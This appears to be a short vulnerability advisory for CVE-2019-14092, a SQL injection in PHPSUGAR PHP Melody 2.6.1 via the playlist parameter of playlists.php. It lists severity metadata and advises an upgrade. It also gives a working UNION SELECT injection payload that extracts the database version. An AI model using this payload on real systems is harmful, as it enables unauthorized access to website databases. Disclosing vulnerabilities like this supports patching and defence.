vendor: PHPSUGAR PHP Melody
by: Venkat Rajgor
CVSS: 5,5 MEDIUM
CWE: 89 (SQL injection)
Product Name: PHPSUGAR PHP Melody
Affected Version From: 2.6.1
Affected Version To: 2.6.1
Patch Exists: YES
Related CVE: CVE-2019-14092
CPE: a:phpsugar:phpsugar_php_melody
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2019
PHPSUGAR PHP Melody 2.6.1 SQL Injection
In PHPSUGAR PHP Melody CMS 2.6.1, SQL Injection exists via the playlist parameter to playlists.php.
Payload Used: ' UNION SELECT null,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),null,null,null,null,null,null,null,null,null-- -
Mitigation:
Upgrade to the latest version of PHPSUGAR PHP Melody CMS.